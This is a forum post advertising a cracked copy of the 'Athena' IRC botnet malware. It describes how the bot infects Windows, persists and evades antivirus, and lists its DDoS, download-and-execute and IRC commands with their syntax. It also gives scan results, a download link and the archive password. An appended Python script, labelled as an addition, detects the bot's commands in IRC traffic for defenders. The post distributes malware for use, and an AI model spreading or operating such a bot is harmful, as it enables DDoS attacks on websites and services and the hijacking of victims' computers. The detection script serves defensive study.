Athena IRC Bot Cracked



DooMsDay
05-20-2013, 11:51 PM
http://puu.sh/XZJT

About:
Athena is an IRC bot coded in C++ (zero dependencies) perfect for infecting Windows machines. After execution, Athena will install deep into the host computer using 18 different potential methods of startup (both registry and non-registry) depending on the environment it is in (OS and privileges). Athena utilizes several techniques to evade potential anti-viruses and botkillers, and remains very stable -- it is great for maintaining a large botnet.

This bot specializes in advanced DDoS attacks (guaranteed stronger than anything you may have witnessed on HF). They are - UDP, Rapid HTTP GET, Slow HTTP POST, Slowloris, ARME (Apache Remote Memory Exhaustion), and Rapid Connect/Disconnect flooding.

Commands/Features:
DDoS Commands
[Port 80 is most common for websites]
!udp - Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use '0' to flood random ports]
!condis - Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoIP servers like gravy(SYNTAX: !condis host/ip port time)
!httpget - Rapidly sends hundreds of HTTP GET requests every second from each bot(SYNTAX: !httpget website.com/directory/index.php port time)[a specific directory/file is optional]
!httppost - Makes hundreds of HTTP POST requests from each bot, and holds connection by slowly posting content(SYNTAX: !httppost host/ip port time)
!slowloris - Connects to a webserver through several hundred sockets per bot, and sits on it.(SYNTAX: !slowloris website.com/directory/index.php port time)[a specific directory/file is optional]
!arme - Exploits a vulnerability in Apache that crashes servers through many bulk partial headers requests at once causing a lot of memory to swap to the remote filesystem.(SYNTAX: !arme website.com/directory/index.php port time)[a specific directory/file is optional]
!httpcombo - Sends organized attacks of ARME, Slowloris, Slow HTTP POST, and Rapid HTTP GET concurrently to a specified target(SYNTAX: !httpcombo website.com port time)

Misc. Bot Commands
!id - Displays the version of the bot and who it is licensed to
!ping - Returns bot's ping time to its current connection
!openurl - Opens a webpage in the default browser(SYNTAX: !openurl http://website.com)
!openurlhidden - Opens a webpage hidden in Internet Explorer(SYNTAX: !openurlhidden http://website.com)
!urlblock - Creates a line in the computer hosts file that disallows access to a specified host(SYNTAX: !urlblock website.com)
!dlexec - Downloads and executes a file from a URL(SYNTAX: !dlexec http://website.com/program.exe)
!update - Downloads and executes a given link. The bot will uninstall after successful execution(SYNTAX: !update website.com/file.exe)
!remove - Uninstalls the bot and deletes any traces of itself

IRC Commands
!raw - Sends raw commands to the server(SYNTAX: !raw PRIVMSG #channel :message)
!silent on/off - Toggles bot output(overridden by the !raw command)
!join - Joins bot to a channel(SYNTAX: !join #channel)
!part - Parts bot from a channel(SYNTAX: !part #channel)
!newnick - Changes bot nickname using a new random number and name
!reconnect - Attempts to reconnect to the current IRC server/network and channel after disconnecting for 10 seconds

Archivo: Build.exe
Tamaño: 96329 Bytes
MD5: 9c1ab8ef6013aba9ccadca9b6d7470f2
SHA1: e04c86b2b382695b0034ca5cf643e45f693d33d9
Resultado: 16/35
Estado: Infectado

AVG Free - May be infected by unknown virus Win32/DH{IAEJAw8}
ArcaVir - OK
Avast 5 - OK
AntiVir (Avira) - TR/Downloader.Gen
BitDefender - Generic.Sdbot.057294AD
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - DLOADER.IRC.Trojan
eTrust-Vet - OK
F-PROT Antivirus - W32/Heuristic-119!Eldorado (not disinfectable)
F-Secure Internet Security - Generic.Sdbot.057294AD
G Data - Generic.Sdbot.057294AD
IKARUS Security - OK
Kaspersky Antivirus - HEUR:Trojan.Win32.Generic
McAfee - OK
MS Security Essentials - Backdoor:Win32/Silby
ESET NOD32 - OK
Norman - W32/Backdoor
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Rising Antivirus - OK
Solo Antivirus - OK
Sophos - Mal/IRCBot-C
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Vexira Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - Trojan.Win32.Ircbot!cobra (v)
BullGuard - Generic.Sdbot.057294AD
Immunet Antivirus - Generic.Sdbot.057294AD
K7 Ultimate - Riskware ( b70d20c90 )
VIPRE - Trojan.Win32.Ircbot!cobra (v)


http://i5.minus.com/jm8j30MOwfHZQ_e.jpg
http://i4.minus.com/jynGx0ZLWahTH_e.jpg

http://cyberlocker.ch/lzsqz4nfa54o

http://sverdos.com/images/pass.png
insanewarez
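
For defenders, the command syntax listed in the post is enough to flag this bot's control traffic in captured IRC sessions. The following is an added detection example, not part of the original post or of the bot itself; the names `SPEC`, `classify` and `channels_of_interest` are hypothetical and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Command names and argument counts come from the SYNTAX strings in the post.
# Generic names (!ping, !join, !id ...) are left out: ordinary IRC bots use them too.
SPEC = {name: ("ddos", 3) for name in
        ("udp", "condis", "httpget", "httppost", "slowloris", "arme", "httpcombo")}
SPEC.update({"dlexec": ("payload", 1), "update": ("payload", 1),
             "urlblock": ("hosts-tamper", 1)})

# Raw IRC line: optional ":prefix", PRIVMSG, target, then ":" and the message text.
PRIVMSG = re.compile(r"^(?::(?P<src>\S+) )?PRIVMSG (?P<dst>\S+) :(?P<text>.*)$")

def classify(line):
    """Return an alert dict for one raw IRC line, or None if it is not a listed command."""
    m = PRIVMSG.match(line.rstrip("\r\n"))
    if not m:
        return None
    parts = m["text"].split()
    if not parts or not parts[0].startswith("!"):
        return None
    name, args = parts[0][1:].lower(), parts[1:]
    if name not in SPEC:
        return None
    category, argc = SPEC[name]
    well_formed = len(args) == argc
    if category == "ddos":  # "target port time": port and time must be numeric
        well_formed = well_formed and args[1].isdigit() and args[2].isdigit()
    return {"channel": m["dst"], "source": m["src"], "command": name,
            "category": category, "confidence": "high" if well_formed else "low"}

def channels_of_interest(lines):
    """Map each channel to the categories of well-formed commands seen in it."""
    hits = defaultdict(set)
    for line in lines:
        alert = classify(line)
        if alert and alert["confidence"] == "high":
            hits[alert["channel"]].add(alert["category"])
    return dict(hits)

SAMPLE = [  # constructed lines, documentation addresses only
    ":op!u@example.net PRIVMSG #ctl :!udp 198.51.100.7 0 120",
    ":op!u@example.net PRIVMSG #ctl :!dlexec http://example.com/program.exe",
    ":bob!b@example.org PRIVMSG #chat :!update when is the next release?",
    ":bob!b@example.org PRIVMSG #chat :hello !udp",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    print(channels_of_interest(SAMPLE))
```

Matching on argument shape as well as command name keeps ordinary chat that happens to start with `!update` at low confidence.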